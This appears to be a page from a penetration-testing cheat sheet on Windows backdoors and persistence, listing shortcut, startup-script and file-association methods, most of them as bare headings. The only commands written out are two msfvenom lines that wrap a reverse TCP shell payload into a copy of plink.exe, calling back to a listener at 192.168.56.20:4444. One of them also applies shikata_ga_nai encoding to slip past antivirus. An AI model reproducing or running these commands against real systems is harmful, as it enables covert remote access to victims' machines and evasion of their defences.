search
githubEdit

Backdoors

hashtag
Backdoor Cheat Sheet

hashtag
Methods

  1. Creating EXE Files

  2. Backdooring Shortcuts

  3. Startup Scripts

  4. Backdooring file associations

hashtag
Create an EXE file

hashtag
msfvenom

# Without encoding
sudo msfvenom -a x64 --platform windows -x /usr/share/windows-binaries/plink.exe -k -p windows/x64/shell_reverse_tcp LHOST=192.168.56.20 LPORT=4444 -b "\x00" -f exe -o plink-malicious.exe

# With encoding
sudo msfvenom -a x64 --platform windows -x /usr/share/windows-binaries/plink.exe -k -p windows/x64/shell_reverse_tcp LHOST=192.168.56.20 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 4 -f exe -o plink-malicious.exe

hashtag
Backdooring Shortcuts

hashtag
Powershell

script.ps1

Modify the shortcut properties

hashtag
Startup Scripts

hashtag
Registry Editor

hashtag
Backdooring file associations

hashtag
backdoor.ps1

hashtag
Registry Editor

hashtag
REFERENCES

  • https://devblogs.microsoft.com/powershell/how-to-access-or-modify-startup-items-in-the-window-registry/

  • https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16

PreviousUser Accounts, Hash Cracking, RID HijackingNextServices